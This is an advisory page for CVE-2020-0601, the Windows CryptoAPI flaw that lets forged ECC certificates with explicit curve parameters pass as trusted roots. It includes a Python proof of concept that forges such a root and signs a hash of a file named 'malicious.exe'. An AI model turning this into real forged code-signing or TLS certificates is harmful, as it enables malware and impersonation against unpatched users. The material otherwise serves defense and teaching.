PT-2020-1289 · Microsoft · Crypt32.dll

Published 2020-01-14 · Updated 2026-01-04 · CVE-2020-0601

CVSS v2.0: 9.4 (High)
Vector: AV:N/AC:L/Au:N/C:C/I:C/A:N
Name of the Vulnerable Software and Affected Versions: Windows CryptoAPI (Crypt32.dll) in Windows 10, Windows Server 2016 and Windows Server 2019 builds prior to the January 14, 2020 security updates. Older Windows releases are not listed as affected.
Description: A spoofing vulnerability exists in the way Windows CryptoAPI (Crypt32.dll) validates Elliptic Curve Cryptography (ECC) certificates. When matching a certificate against a cached trusted root, the library compared the ECC public key but not the curve parameters carried in the certificate. X.509 allows an ECC key to specify its curve explicitly (prime, coefficients, generator point and order) instead of naming a standard curve, so an attacker can craft a certificate that reuses the public key point Q of a genuine trusted ECC root while supplying a custom generator G' = d'^-1 · Q for a private key d' the attacker knows. Because d' · G' = Q, the key matches the cached root and Windows treats the forged certificate as that trusted root, accepting any chain and signature the attacker issues beneath it. In practice this lets an attacker sign a malicious executable with a spoofed code-signing certificate so the file appears to come from a trusted, legitimate source, and present forged TLS server certificates that pass validation in applications relying on CryptoAPI. No estimate of the number of affected devices worldwide is given.
Recommendations: Apply the Microsoft security updates released on January 14, 2020 for all affected Windows 10 and Windows Server builds. Microsoft provides no workaround; disabling ECC certificates or avoiding Crypt32.dll is not a practical mitigation because the library underpins certificate validation across the platform. After patching, monitor the Application event log for Event ID 1 from source Microsoft-Windows-Audit-CVE (shown as Audit-CVE), which the updated Crypt32.dll writes when it encounters a certificate that would have exploited CVE-2020-0601. Applications that perform their own certificate validation, or that must run on hosts not yet patched, should reject ECC certificates that carry explicit curve parameters instead of a named curve, since genuine CA certificates use named curves. Google Chrome shipped such a check, and the Go identifiers listed below track the corresponding mitigation in Go's crypto/x509, which uses CryptoAPI for chain verification on Windows.
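The following is an added worked example, not code from the PT-2020-1289 page, from Microsoft, or from any exploit for this CVE. It reproduces the flaw described above in pure Python with NIST P-256 arithmetic: the trusted root's private key, the attacker's private key d' = 2, the signing nonce and the hashed file name are all constructed for the demo. `vulnerable_match` stands in for the pre-patch lookup that compares only the public key; `patched_match` also compares the curve parameters, which is the check the recommendations call for; the ECDSA routines show that a signature made with d' verifies under the genuine root's public key only when the verifier accepts the attacker's explicit generator.

```python
import hashlib

# NIST P-256 domain parameters (real constants, as published in FIPS 186-4).
P = 0xffffffff00000001000000000000000000000000ffffffffffffffffffffffff
A = P - 3
B = 0x5ac635d8aa3a93e7b3ebbd55769886bc651d06b0cc53b0f63bce3c3e27d2604b
GX = 0x6b17d1f2e12c4247f8bce6e563a440f277037d812deb33a0f4a13945d898c296
GY = 0x4fe342e2fe1a7f9b8ee7eb4a7c0f9e162bce33576b315ececbb6406837bf51f5
N = 0xffffffff00000000ffffffffffffffffbce6faada7179e84f3b9cac2fc632551
# What a certificate's "named curve" secp256r1 expands to.
P256 = {"p": P, "a": A, "b": B, "g": (GX, GY), "n": N}

def ec_add(p1, p2, p=P, a=A):
    """Affine point addition on y^2 = x^3 + a*x + b (mod p); None is infinity."""
    if p1 is None:
        return p2
    if p2 is None:
        return p1
    x1, y1 = p1
    x2, y2 = p2
    if x1 == x2 and (y1 + y2) % p == 0:
        return None                      # P + (-P)
    if p1 == p2:
        lam = (3 * x1 * x1 + a) * pow(2 * y1, -1, p) % p
    else:
        lam = (y2 - y1) * pow(x2 - x1, -1, p) % p
    x3 = (lam * lam - x1 - x2) % p
    return (x3, (lam * (x1 - x3) - y1) % p)

def ec_mul(k, point, p=P, a=A):
    """Double-and-add scalar multiplication k*point."""
    result, addend = None, point
    while k:
        if k & 1:
            result = ec_add(result, addend, p, a)
        addend = ec_add(addend, addend, p, a)
        k >>= 1
    return result

def on_curve(pt, p=P, a=A, b=B):
    x, y = pt
    return (y * y - (x ** 3 + a * x + b)) % p == 0

def ecdsa_sign(z, d, params, k):
    """Textbook ECDSA over the given parameters; nonce k is caller-supplied."""
    n = params["n"]
    r = ec_mul(k, params["g"])[0] % n
    s = pow(k, -1, n) * (z + r * d) % n
    return (r, s)

def ecdsa_verify(z, sig, pub, params):
    """Verifies with the generator in `params`, as a verifier that trusts the
    certificate's own explicit parameters would."""
    n = params["n"]
    r, s = sig
    w = pow(s, -1, n)
    x = ec_add(ec_mul(z * w % n, params["g"]), ec_mul(r * w % n, pub))
    return x is not None and x[0] % n == r

def make_trusted_root():
    # Constructed CA private key for the demo; not any real CA's key.
    d = 0x0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef
    return {"params": P256, "pub": ec_mul(d, P256["g"])}

def forge_root(target_pub, d_prime=2):
    """Attacker's certificate: same public key Q as the trusted root, but
    explicit parameters whose generator is G' = d'^-1 * Q, so d' * G' = Q
    for a private key d' the attacker chose."""
    g_prime = ec_mul(pow(d_prime, -1, N), target_pub)
    params = dict(P256, g=g_prime)
    return {"params": params, "pub": ec_mul(d_prime, g_prime)}, d_prime

def vulnerable_match(cert, trusted):
    """Pre-patch lookup: the cached root is matched on the public key alone."""
    return cert["pub"] == trusted["pub"]

def patched_match(cert, trusted):
    """Fixed lookup: public key and curve parameters must both match."""
    return cert["pub"] == trusted["pub"] and cert["params"] == trusted["params"]

def demo():
    root = make_trusted_root()
    forged, d_prime = forge_root(root["pub"])
    # Hash of a (constructed) file the attacker wants to appear CA-signed.
    z = int.from_bytes(hashlib.sha256(b"malicious.exe").digest(), "big") % N
    sig = ecdsa_sign(z, d_prime, forged["params"], k=0x1234567)
    return {
        "forged_key_equals_root_key": forged["pub"] == root["pub"],
        "forged_generator_on_curve": on_curve(forged["params"]["g"]),
        "vulnerable_accepts_forgery": vulnerable_match(forged, root),
        "patched_accepts_forgery": patched_match(forged, root),
        "patched_accepts_genuine": patched_match(root, root),
        # A signature made with d' verifies under Q only with the attacker's G'.
        "sig_ok_with_forged_params": ecdsa_verify(z, sig, root["pub"], forged["params"]),
        "sig_ok_with_real_params": ecdsa_verify(z, sig, root["pub"], P256),
    }

if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

Running the script prints each check: the forgery passes the key-only comparison and its signature verifies against the real root's public key under the forged parameters, while the parameter comparison rejects it. In a real certificate the attacker's generator would be encoded in the SubjectPublicKeyInfo's ECParameters using the explicit (specifiedCurve) form; requiring the namedCurve form, as the recommendation above describes, removes the attacker's freedom to choose G'.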

Weakness Enumeration

CWE-295: Improper Certificate Validation

Related Identifiers

BDU:2020-00181
BIT-GOLANG-2020-0601
CVE-2020-0601
GO-2022-0535

Affected Products

Crypt32.dll
Google Chrome
Windows
Windows CryptoAPI